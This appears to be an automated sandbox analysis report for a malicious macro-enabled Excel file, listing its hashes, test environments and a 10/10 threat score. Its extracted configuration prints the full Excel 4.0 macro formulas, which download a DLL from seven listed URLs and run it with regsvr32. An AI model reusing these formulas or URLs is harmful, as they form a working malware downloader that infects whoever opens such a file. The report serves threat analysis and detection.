General
-
Target
68315e1feb6ef2fb06932f144099d61724443acbd3d69e763901dd79293002f5
-
Size
30KB
-
Sample
241120-k3g6psyrcq
-
MD5
a4b78de4410c0e207506e26bb8b5ed7e
-
SHA1
bcbd442fffd082a52a7e9efbf798fb8b58066cc7
-
SHA256
68315e1feb6ef2fb06932f144099d61724443acbd3d69e763901dd79293002f5
-
SHA512
48088cb69a3f337c7532398039964a9cb64c9fa793bf74de39031767d17548133e8a9f174a2cb1f7f5af9f8b5cee25f741f9b6c5f5547b422804a4ce2f5213b4
-
SSDEEP
384:HwdAZPFhNjUA7icg0SCdiVAg2GKgUrNU/qWhZOdBNPJM+kqr9eCgh0k5NGE6h:QdwFhNbiH2rndFfPdkqstJNGE6h
Behavioral task
behavioral1
Sample
68315e1feb6ef2fb06932f144099d61724443acbd3d69e763901dd79293002f5.xlsm
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
68315e1feb6ef2fb06932f144099d61724443acbd3d69e763901dd79293002f5.xlsm
Resource
win10v2004-20241007-en
Malware Config
Extracted
http://www.ajaxmatters.com/c7g8t/hAQX/
http://acsconnection.com/wMHahVuKdttKf5doY/
http://aopda.org/wp-content/uploads/dnQjiyCcSvTbX/
http://www.seroja.edu.my/wp-includes/xL7xTYNQ/
http://intranet.fiscaltech.com.br/wp-softwares/G2DUFrG3OIV/
http://www.ifscapital.com.my/G1lIGo/
http://topadmin.topinteriors.co.in/tabler-dist/ga2l8Ioyrba/
-
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/hAQX/","..\rfs.dll",0,0) =IF('LFEVE'!F11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://acsconnection.com/wMHahVuKdttKf5doY/","..\rfs.dll",0,0)) =IF('LFEVE'!F13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://aopda.org/wp-content/uploads/dnQjiyCcSvTbX/","..\rfs.dll",0,0)) =IF('LFEVE'!F15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.seroja.edu.my/wp-includes/xL7xTYNQ/","..\rfs.dll",0,0)) =IF('LFEVE'!F17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://intranet.fiscaltech.com.br/wp-softwares/G2DUFrG3OIV/","..\rfs.dll",0,0)) =IF('LFEVE'!F19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ifscapital.com.my/G1lIGo/","..\rfs.dll",0,0)) =IF('LFEVE'!F21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://topadmin.topinteriors.co.in/tabler-dist/ga2l8Ioyrba/","..\rfs.dll",0,0)) =IF('LFEVE'!F23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll") =RETURN()
Extracted
http://www.ajaxmatters.com/c7g8t/hAQX/
Targets
-
-
Target
68315e1feb6ef2fb06932f144099d61724443acbd3d69e763901dd79293002f5
-
Size
30KB
-
MD5
a4b78de4410c0e207506e26bb8b5ed7e
-
SHA1
bcbd442fffd082a52a7e9efbf798fb8b58066cc7
-
SHA256
68315e1feb6ef2fb06932f144099d61724443acbd3d69e763901dd79293002f5
-
SHA512
48088cb69a3f337c7532398039964a9cb64c9fa793bf74de39031767d17548133e8a9f174a2cb1f7f5af9f8b5cee25f741f9b6c5f5547b422804a4ce2f5213b4
-
SSDEEP
384:HwdAZPFhNjUA7icg0SCdiVAg2GKgUrNU/qWhZOdBNPJM+kqr9eCgh0k5NGE6h:QdwFhNbiH2rndFfPdkqstJNGE6h
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-